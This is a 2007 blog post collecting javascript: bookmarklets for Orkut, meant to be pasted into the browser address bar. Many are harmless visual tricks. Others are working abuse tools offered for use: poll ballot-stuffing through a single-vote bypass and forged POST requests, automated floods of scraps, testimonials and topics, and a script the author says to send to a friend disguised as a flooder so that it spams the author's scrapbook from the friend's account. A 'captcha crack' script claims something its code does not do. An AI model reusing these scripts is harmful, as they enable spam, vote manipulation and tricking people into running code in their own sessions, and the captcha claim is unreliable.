Friday, November 30, 2007

Some Javascripts of Orkut !!


Multiple Voting script


Hey frends by using this script u will be able to vote for multiple choices even if the setting is set to single vote

javascript:inputs=document.getElementsByTagName('input');for(x=0;x<inputs.length;x++){tipo=inputs[x].type;if(tipo=="radio"){inputs[x].type="checkbox";inputs[x].checked="true"}};void(0)


Directions:
1.go to the poll
2.Paste the script in the address bar and hit enter
3.u get options for multiple voting

Note:It works only in firefox and not internet explorer


 

New Trick


Hey ppl this is a new trick........copy da foll in the address bar and hit enter ...............

javascript: mwunm=0; c=["red","blue","green"]; a=document.links;setInterval('mwunm++;a[mwunm % document.links.length].style.color=c[mwunm % c.length]',10);void(0)





Are you low at scraps? Flood your or your friends' scrapbooks with thousands of scraps in one go.

 

Follow the steps:

1) Open your scrapbook.

2) Write anything in the scrapbook. Do NOT click Submit.

3) Copy the following text and paste it in your address bar.

 

javascript:i=0;sar=document.getElementsByTagName('TEXTAREA').item(0).value;document.body.innerHTML+='<iframe name="TextFlooding" width="680" height="430"></iframe>';document.forms[1].target='TextFlooding';setInterval("document.getElementsByTagName('TEXTAREA').item(0).value=sar +' '+ i;a=submitForm(document.forms[1], 'submit', '');i++",2000);void(0);




Testimonial flooding!


==> Open the testimonial writting page of your any friend.
==> Paste this in the address bar:javascript:function sansor(){document.getElementsByTagName
(’input’).item(2).click();};void(setInterval(sansor,404)); There are some software available which will do all these sh*ts using some GUI.. I will
soon post the link for that. Keep checking my blogs..


Open your scrap book n paste this link to address bar.

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);


Browser's Earthquake

javascript:function flood(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);



Message Display
javascript:function reverse() { var inp = " ! skcirt n spit ot emocleW "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();



Dancing Images


javascript:b=[]; a=document.images; for(wt=0; wt<a.length; wt++){a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0; setInterval('j++; for(wt=0; wt<b.length; wt++){b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1); void(0);



Colourfull Lool (suits Orkut)


javascript: mwunm=0; c=["red","blue","green"]; a=document.links;setInterval('mwunm++;a[mwunm % document.links.length].style.color=c[mwunm % c.length]',10);void(0);



Mad Orkut


javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0);



Colourfull Scraps


javascript:cor=new Array('b','green','yellow','red' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);



Image Roller


javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300;y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5;DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);



Colour logout Button


javascript: x=0; c=["red","yellow"]; setInterval('x=x^1;document.links[2].style.color=c[x]',100);void(0);


 


Add signature after message


javascript: a=document.getElementsByTagName('textarea')[0];a.value="[*red]"+a.value+"\n\n\n[*/b][*/red][*b][*gold]arsh\n\n[*b]";void(0)


Dont forget to remove the * frm the script


 


Delete Topic (can be done only by the person hu created the topic)


javascript:submitForm(document.forms[1],'delete_entire_topic','');void(0);


 



Vote:Select All Options


javascript:inputs=document.getElementsByTagName('input');for(x=0;x<inputs.length;x++){tipo=inputs[x].type;if(tipo=="radio"){inputs[x].type="checkbox";inputs[x].checked="true"}};void(0)


Note: Works only wid Mozilla Firefox


 



Vote Flooder..!!


javascript:opcao=prompt("enter option u want to flood eg like 1 or 2 or 3 or 4...","");votos=prompt("enter no. of votes?\n31 max",31);send = "POST_TOKEN="+encodeURIComponent(document.getElementsByName('POST_TOKEN')[0].value)+"&signature="+encodeURIComponent(document.getElementsByName('signature')[0].value);for(x=0; x<votos; x++){ send += "&option="+opcao;}send += "&public_vote=1&Action.vote=Enviar+dados";xml=new XMLHttpRequest();xml.open("POST",location.href,false);xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xml.send(send);document.body.innerHTML=xml.responseText;void(0)


Note: Works Only Wid Mozilla Firefox


 

Fancy Text Maker Script
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"a");txt.value=txt.value.replace(/p/gi,"?");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?");txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/u/gi,"?");txt.value=txt.value.replace(/h/gi,"?");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"?");void(0);

 

 

More Here

javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);

 

 

Edit Mode Of Browser

javascript:document.body.contentEditable='true'; document.designMode='on'; void(0);

 


More Cool fancy fonts


javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/A/gi,"Å");txt.value=txt.value.replace(/B/gi,"ß");txt.value=txt.value.replace(/C/gi,"©");txt.value=txt.value.replace(/D/gi,"Ð");txt.value=txt.value.replace(/E/gi,"Ë");txt.value=txt.value.replace(/F/gi,"ƒ");txt.value=txt.value.replace(/i/gi,"î");txt.value=txt.value.replace(/s/gi,"§");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/u/gi,"µ");txt.value=txt.value.replace(/r/gi,"®");void(0);


 

n More
javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);

n More
javascript:cor=new Array('b','blue','u',':)','red','i',':p','green','b',':d','b');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);


n More
javascript:cor=new Array('b','blue','u','red','i','green','b');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);



Sum more cool fonts


javascript:var txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/a/gi,"ą"); txt.value=txt.value.replace(/b/gi,"Ъ"); txt.value=txt.value.replace(/c/gi,"⊂"); txt.value=txt.value.replace(/d/gi,"Ժ"); txt.value=txt.value.replace(/e/gi,"ξ"); txt.value=txt.value.replace(/f/gi,"千"); txt.value=txt.value.replace(/g/gi,"ǥ"); txt.value=txt.value.replace(/h/gi,"孔"); txt.value=txt.value.replace(/i/gi,"Į"); txt.value=txt.value.replace(/j/gi,"ໆ"); txt.value=txt.value.replace(/k/gi,"ҝ"); txt.value=txt.value.replace(/l/gi,"Ⅼ"); txt.value=txt.value.replace(/m/gi,"♏"); txt.value=txt.value.replace(/n/gi,""); txt.value=txt.value.replace(/o/gi,"ø"); txt.value=txt.value.replace(/p/gi,"ρ"); txt.value=txt.value.replace(/q/gi,"ℚ"); txt.value=txt.value.replace(/r/gi,"ř"); txt.value=txt.value.replace(/s/gi,"૬"); txt.value=txt.value.replace(/t/gi,"Ŧ"); txt.value=txt.value.replace(/u/gi,"☋"); txt.value=txt.value.replace(/v/gi,"√"); txt.value=txt.value.replace(/w/gi,"ω"); txt.value=txt.value.replace(/x/gi,"乂"); txt.value=txt.value.replace(/y/gi,"Ⴘ"); txt.value=txt.value.replace(/z/gi,"之");


 

 

n more
javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"α");txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"и");txt.value=txt.value.replace(/t/gi,"т");txt.value=txt.value.replace(/E/gi,"є");txt.value=txt.value.replace(/f/gi,"ƒ");txt.value=txt.value.replace(/i/gi,"ι");txt.value=txt.value.replace(/s/gi,"$");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/m/gi,"м");txt.value=txt.value.replace(/r/gi,"я");void(0);

 


n More
javascript:cor=new Array('violet','orange','green');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n'); txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/ /gi,":¦: ? :¦:");void(0);


 

n More

javascript:cor=new Array('green',':x','gold',';)','blue',':)','red',':(','orange','8)','green',':D','blue',':o','lime','/)','gray',':P');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n');void(0);


Script called Holi


javascript: i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);


 



Display Image Size Expander


javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,"medium");void(0);


 


N more
javascript:var a=document.getElementsByTagName('textarea')[0];a.value=a.value.replace(/|/g," \n ");void(0);javascript:cor=new Array('violet','red','orange','yellow','green','blue','navy','purple');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);


 



Add Yourself in Orkut
------------
* Click on Friends.
* Paste the script in the Address Bar.
* Press Enter.
* You will see a Friend Request from your own ID...


javascript:add=document.forms[1]; add.action='FriendAdd.aspx?Action.yes&'+location.href.match(/uid=\d*/gi);add.submit();alert('User Added ;)'); void (0)


However U cannot accept it


 



n More


javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"?");txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?");txt.value=txt.value.replace(/E/gi,"e");txt.value=txt.value.replace(/f/gi,"ƒ");txt.value=txt.value.replace(/p/gi,"Þ");txt.value=txt.value.replace(/s/gi,"s");txt.value=txt.value.replace(/o/gi,"?");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"r");void(0);


 


n More
javascript:cor=new Array(':)','blue');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);


n More
*?*
*?* I *?*
*?* s *?*
*?* n *?*
*?* t *?*
*?* *?*
*?* d *?*
*?* i *?*
*?* s *?*
*?* *?*
*?* t *?*
*?* h *?*
*?* e *?*
*?* *?*
*?* b *?*
*?* e *?*
*?* s *?*
*?* t *?*
*?* *?*
*?* ? *?*
*?*



javascript:var a=document.getElementsByTagName('textarea')[0];a.value=a.value.replace(/|/g," *?* \n*?* ");void(0);javascript:cor=new Array('violet','red','orange','yellow','green','blue','navy','purple');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);


 


n More

 

javascript:msgm=prompt("mensagem ");cor1="green";cor2="blue";cor3="red";b="b";i="i";flor="\n["+b+"]["+cor2+"]e??[/"+cor2+"] ["+i+"]"+msgm+"[/"+i+"] ["+cor2+"]e??[/"+cor2+"]\n\n["+b+"]["+cor1+"]???["+cor3+"]?["+cor1+"]???\n";z=document.getElementsByTagName('textarea')[0];z.value=flor;void(0);

 


 

n More

javascript:var bold="b";var italic="i";var color="red";var color2="navy";var cxtxt=document.getElementsByTagName('textarea')[0];var meuString = cxtxt.value;var result = "";for (i=0;i<meuString.length-1;i++){result += "?";result += "["+bold+"]["+color2+"]"+meuString.charAt(i)+"[/"+color2+"][/"+bold+"]";result += "?"};result += meuString.charAt(meuString.length - 1);cxtxt.value="["+italic+"]["+color+"]"+result;void(0);


delete topic frm community.......
Requirement: You must be the creator of the topic in the community. You NEED NOT be the owner of the community. The first post created by you must be still present.
Open the first page of the topic created by you in the community.
Copy the following java script into the URL Bar.


javascript:_submitForm(document.forms[1]<wbr>,'delete_entire_topic','');void(0)



Hit ENTER.
Your topic is deleted


 

n More

javascript:i=0;document.body.innerHTML+='<iframe name="TF" width="1" height="1"></iframe>';function cs1(){cs=replyForm;cs.toUserId.value=46811582;cs.target='TF';cs.scrapText.value="HI" + i;cs.action='Scrapbook.aspx?Action.writeScrapBasic';cs.submit();i++};crazy=document.getElementsByTagName('TEXTAREA').item(0).value;document.body.innerHTML+='<iframe name="tf2" width="800" height="400"></iframe>';document.forms[1].target='tf2';setInterval("document.getElementsByTagName('TEXTAREA').item(0).value=crazy +' '+ i;a=_submitForm(document.forms[1], 'writeScrapBasic', '');i++",1300);void(setInterval(cs1,800))


Change the portion in red with ur "gid"



Still Thinking wht it does???
Well Send this script to ur frend saying it is a scrapbook flooder.........it will flood his scrapbook along with urs........Change the portion in green wid wht u want him/her to flood ur scrapbook wid............
The person should be on ur frend list!!


Note:Tell him/her to use firefox...................cauz it doesnt work in IE!
Wondering wht ur "gid" is???
To find out go to ur profile and then view source


Find sumtin like this:



<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td>
<div class="navPanelTop" width="144">
<div style="background-image: url(http://img2.orkut.com/images/medium/1181293889/46811582.jpg); background-position: center; background-repeat: no-repeat; width: 144px; height:128px;" >
<div style="text-align: center; background-image:url(http://img1.orkut.com/img/b.gif); width: 144px; height: 128px; vertical-align: middle;">


<img src="http://img1.orkut.com/img/b.gif" height="128" width="128" alt="" />
</div>
</div>



The thing in red is ur gid........replace mine wid urs



It should be 8 bit gid value


this is actually a bug in poll..


well here what this actually does ( see the comment part )
http://www.orkut.com/CommPollResults.aspx?cmm=40588034&pct=1194533995&pid=940476781

method :


run this javascript in the poll page


 



javascript:nobody=1;send = "POST_TOKEN="+encodeURIComponent(document.getElementsByName('POST_TOKEN')[0].value)+"&signature="+encodeURIComponent(document.getElementsByName('signature')[0].value);for(x=0; x<31; x++){ send += "&option="+nobody;nobody++}send += "&public_vote=1&Action.vote=Send+Data";xml=new XMLHttpRequest();xml.open("POST",location.href,false);xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xml.send(send);document.body.innerHTML=xml.responseText;alert("Done...:)\n Hit the refresh button"); void(0);


then it takes u to "bad bad server ......" page


just hit the refresh button ... and u r done ...


it shows that there are no votes though it shows a tick


this works only in Firefox ... for opera u need to edit the source



Time pass ....lol..
javascript:name=prompt("Type Your name here");alert(" HI " + name + " \nHowz Life ");

fancy script


javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);



see this too..fancy script


javascript:i=0;c=["red","green","blue","yellow","magenta","orange","pink","violet"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0); alert("Tips n tricks rocks! ");


 

check it

javascript:add=document.forms[1];add.action='FriendAdd.aspx?Action.yes&'+location.href.match(/uid=\d*/gi);add.submit(); void (0);

 


# Run the script whenever you are sending an link to any one.This will break captcha and the link will be in colours.
# This will help you to send easy scraps without the captcha's.
# Paste any one of the below scripts and run on the page you have opened(scrapbook).


 


javascript: var friend =1;for(i=1;i<=friend;i++){msg="";if(i==1)msg=" captcha crack!! By:Amna!";alert(msg);}i=0; c=["violet","red","purple"];a=document.links;setInterval('i++;a[i %document.links.length].style.color=c[i %c.length]',1);void(0);javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"a");txt.value=txt.value.replace(/p/gi,"?");txt.value=txt.value.replace(/N/gi,"?");txt.valuetxt.value.replace(/t/gi,"?");txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/u/gi,"?");txt.value=txt.value.replace(/h/gi,"?");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"?");void(0);javascript:cor=newArray('b','red','/red','/b');var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/(´)/gi,"[/b*][violet*]&*#9825[/violet*]");txt.value=txt.value.replace(/(`)/gi,"[b*][violet*]&*#9825[/violet*][/b*]");txt.value=txt.value.replace(/(~)/gi,"[/b*][purple*]&*#9829[/purple*]");txt.value=txt.value.replace(/\§/gi,"");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);


 


use this script in ur scrapbook to make the text area biggg

javascript: function nik(){document.forms[1].elements[2].rows="30";}void(setInterval(nik,0));

 


:accept all pending requests


javascript: i=0; document.body.innerHTML+='<iframe name="z" width="680" height="430"/>'; setInterval('i++;x=document.forms[ i ];x.target="z";_submitForm(x, "acceptPending");',1200);void(0);


 



script to accept all testimonials


javascript:i=1;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0);


 



script to reject all testimonials


javascript:i=2;setInterval('_submitForm(document.forms[ i ],"handleTestimonial");i=i+2',800);void(0);


 



TOPIC FLOODER (new)



javascript:var i=0;function de(){i=Math.floor(Math.random()*98153556346);document.getElementsByTagName("textarea").item(0).value="Death " + i;document.getElementById("subject").value="death "+i;;_submitForm(document.getElementsByTagName('tr').item(15),'submit','');}void(setInterval(de,800));


 



HOw 2 use ---------
* Open any page in Orkut which contains text box.
* Type the message.
* Paste one of the following Scripts in the Address Bar.
* Press Enter.
* Then Click Submit...


javascript:cor=new Array('aqua','blue','fuchsia','gold','gray','green','lime','maroon','navy','olive','orange','pink','purple','red','silver','teal','violet', 'yellow' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0);


____________________________________________________________________________________________



javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/A/gi,"Ã-") ;txt.value=txt.value.replace(/B/gi,"Ãy");txt.value=txt.value.replace(/C/gi,"©");txt.value=txt.value.replace(/D/gi,"Ð"); txt.value=txt.value.replace(/E/gi,"Ã<");txt.value=txt.value.replace(/F/gi,"Æ'");txt.value=txt.value.replace(/i/gi,"î");txt.value= txt.value.replace(/s/gi,"§");txt.value=txt.value.replace(/o/gi,"ø");txt.value=txt.value.replace(/u/gi,"µ");txt.value=txt.value. replace(/r/gi,"®");void(0);


____________________________________________________________________________________________________


javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0);



SOME MORE 4 YOU



javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"?"); txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?") ;txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/f/gi,"f");txt.value=txt.value.replace (/p/gi,"þ");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?") ;txt.value=txt.value.replace(/r/gi,"?");void(0);


____________________________________________________________________________________________________


 


javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"?");txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?");txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/f/gi,"ƒ");txt.value=txt.value.replace(/p/gi,"þ");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"?");void(0);


 



MORE MORE


javascript:cor=new Array('green',':x','gold',';)','blue',':)','red',':(','orange','8)','green',':D','blue',':o','lime','/)','gray',':P');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n');void(0);


 


MORE KOOL FONTS
____________________________________________________________________
javascript:cor=new Array('aqua','blue','fuchsia','gold','gray','green','lime','maroon','navy','olive','orange','pink','purple','red','silver','teal','violet', 'yellow' );var z=0;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'['+cor[z]+']');z++;if(z==cor.length){z=0}}void(0)


=+=+=+=+=


javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"?"); txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"?") ;txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/f/gi,"f");txt.value=txt.value.replace (/p/gi,"þ");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?") ;txt.value=txt.value.replace(/r/gi,"?");void(0);



=======


javascript:cor=new Array('u','b','i','u');var z=1;txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/(.)/gi,"§$1");txt.value=txt.value.replace(/\§ /gi," ");for(y=0;y<txt.value.length;y++){txt.value=txt.value.replace(/\§/,'[/'+cor[z-1]+']'+'['+cor[z]+']');z++;if(z==cor.length){z=1}}void(0)



=======


javascript:cor=new Array('violet','orange','green');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n'); txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/ /gi,":¦: ? :¦:");void(0);


 


 


javascript:msgm=prompt("mensagem ");cor1="green";cor2="blue";cor3="red";b="b";i="i";flor="\n["+b+"]["+cor2+"]e??[/"+cor2+"] ["+i+"]"+msgm+"[/"+i+"] ["+cor2+"]e??[/"+cor2+"]\n\n["+b+"]["+cor1+"]???["+cor3+"]?["+cor1+"]???\n";z=document.getElementsByTagName('textarea')[0];z.value=flor;void(0);


 


javascript:msgm=prompt("Type Your Message Here ");cor1="green";cor2="blue";cor3="red";b="b";i="i";flor="\n["+b+"]["+cor2+"]e??[/"+cor2+"] ["+i+"]"+msgm+"[/"+i+"] ["+cor2+"]e??[/"+cor2+"]\n\n["+b+"]["+cor1+"]???["+cor3+"]?["+cor1+"]???\n";z=document.getElementsByTagName('textarea')[0];z.value=flor;void(0);


 



javascript:cor=new Array('teal','orange','olive','violet','maroon');var z=0;txt=document.getElementsByTagName('textarea')[0]; txt.value=txt.value.replace(/\n/gi,'§ ');sp=txt.value.split(' ');txti='';for(l=0;l<sp.length;l++){txti+="["+cor[z]+"]"+sp+' ';z++;if(z==cor.length){z=0}}; txt.value=txti;txt.value=txt.value.replace(/\§/gi,'\n'); txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/ /gi,"?(•?.•?)?");void(0);



Love happen's once and the rest is just life!!!!

No comments:

>